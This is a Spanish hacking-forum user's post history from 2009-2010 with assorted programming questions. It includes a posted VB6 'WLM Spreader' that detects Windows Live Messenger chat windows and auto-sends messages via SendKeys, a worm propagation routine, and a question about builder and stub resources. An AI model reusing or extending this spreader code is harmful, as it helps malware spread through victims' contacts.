elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios

Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16
101  Foros Generales / Dudas Generales / Re: Especie de lupa en la barra de tareas... en: 9 Enero 2010, 21:08 pm
Has probado a darle doble click para abrirlo? o poniendo el cursor encima de la lupa, y te dirá algo (normalmente), y a raiz de eso, ps puedes saber más cosas y tal.. xD

Ustedes leen cuando posteo algo?, cuando digo que no hace nada, no interactua con el usuario, no hace nada parece una simple imagen !
102  Foros Generales / Dudas Generales / Re: Especie de lupa en la barra de tareas... en: 9 Enero 2010, 19:39 pm
Oh sí, interesante... ¿y la pregunta es?

A que se debe esa lupa?, no instale nada, salió sola..
103  Foros Generales / Dudas Generales / Especie de lupa en la barra de tareas... en: 9 Enero 2010, 19:34 pm

A que se debe esa lupa?, no instale nada, salió sola..
No tiene menu popup, no encuentro su proceso ni nada de nada

:S
104  Programación / ASM / [FASM-DUDA] Leer contenido de un recurso en: 4 Enero 2010, 14:09 pm
Bueno estoy probando a hacer un constructor con ASM, la mejor manera que pensé fue agreganndole un recurso desde el constructor al stub con los datos dentro, ahora el dilema es como abrir el recurso que agregó el constructor?

Saludos! :huh:
105  Programación / Programación Visual Basic / Re: Personal Algorythm + Source en: 6 Diciembre 2009, 12:57 pm
JAJAJA Me arrastraron por los suelos  :-X
Un poco más y vienen a mi casa me pegan dos bofetadas y me dicen esto está maaall... (es broma xD)
Esto me aclarará varias cosas.

Saludos!

106  Programación / Programación Visual Basic / Re: Personal Algorythm + Source en: 5 Diciembre 2009, 22:17 pm
Código
  1.  
  2. For a = 0 To 75    'Error
  3.  For x = 0 To 75   'Error
  4.   If a <> x Then
  5.    If txtChr(a).Text = txtChr(x).Text Then
  6.     txtChr(a).BackColor = &H8080FF
  7.     txtChr(x).BackColor = &H8080FF
  8.    ElseIf Len(txtChr(a).Text) > 1 Then
  9.     txtChr(a).BackColor = &H8080FF
  10.    ElseIf Len(txtChr(x).Text) > 1 Then  ' Posible Error
  11.     txtChr(x).BackColor = &H8080FF
  12.    End If
  13.   End If
  14.  Next x
  15. Next a
  16.  
  17.  

Que podría pasar?, yo lo veo normal.
Gracias por tomarte el tiempo de ver el source  ;-)
107  Programación / Programación Visual Basic / Personal Algorythm + Source en: 5 Diciembre 2009, 18:14 pm
Bueno este proyecto lo tenía parado, un dia se me ocurrió la idea de hacer un programa que cree un modulo para proyectos de VB6 (Visual Basic 6) con la función de cifrar y descifrar datos, lo que hice fue un programa con la opción de hacer un algoritmo personal, sustituyendo carácteres por otros.

Forma de uso :
Para llamar a la función de cifrar 'cifrado = Encrypt(Datos, Contraseña)'
Para llamar a la función de descifrar 'descifrado = Decrypt(Datos, Contraseña)'

Descargar Personal Algorythm (Binario)
Descargar Personal Algorythm (Source)

Contraseña de los ficheros : SCB Lab's

Saludos!  :D
108  Programación / ASM / Re: videotutoriales de ensamblador (rapidshare) en: 1 Diciembre 2009, 17:40 pm
Muchas gracias me servirá mucho  :P
109  Programación / Programación Visual Basic / Re: Simple 'WLM' Spreader en: 18 Noviembre 2009, 18:05 pm
Muy simple, pero util para los que empiecen con APIs :P

Solo una cosa, esta instruccion 'InStr(1, Capt, "@")' no seria necesaria, ya que si haces un Split y no hay ningun '@' el codigo no seguira ;D

Uyy que bobo, cierto se me fue la hoya.   :huh::silbar:

110  Programación / Programación Visual Basic / Simple 'WLM' Spreader en: 18 Noviembre 2009, 17:07 pm
Bueno ShadeHack me pidió un propagador de msn e hice este muy sencillo =)
Se puede poner otra verificación del caracter '<'

Requerido 1 timer.

Código
  1. Private Declare Function GetWindowText Lib "User32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
  2. Private Declare Function GetForegroundWindow Lib "User32" () As Long
  3. Dim lRet As Long, nWindow As String, Capt As String, Dat() As String
  4.  
  5. Private Sub TM_Timer()
  6. lRet = GetForegroundWindow() ' Obtenemos el handle de la ventana activa
  7. Capt = Space$(1024) ' Creamos un buffer para el titulo de la ventana
  8. nWindow = GetWindowText(lRet, Capt, Len(Capt)) ' Obtenemos la cantidad de carácteres
  9. Capt = Left$(Capt, nWindow) ' Obtenemos el nombre de la ventana
  10.  
  11. If Capt <> "" Then ' Verificamos que en la variable Capt haya datos
  12.  Dat() = Split(Capt, "@") ' Hacemos un split para hacer una 1 verificación
  13.  If UBound(Dat) > 0 Then ' Verificamos si dentro de la matriz Dat() hay datos
  14.   If InStr(1, Dat(1), ">") Then SendKeys ("Hola soy tu menstruación!" & "{ENTER}")  ' Hacemos una 2 verificación para saber si es una ventana de Windows Live Messenger y mandamos el mensaje
  15. End If
  16. End Sub
  17.  
  18.  

Descargar proyecto WLM Spread

Saludos! ;D
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines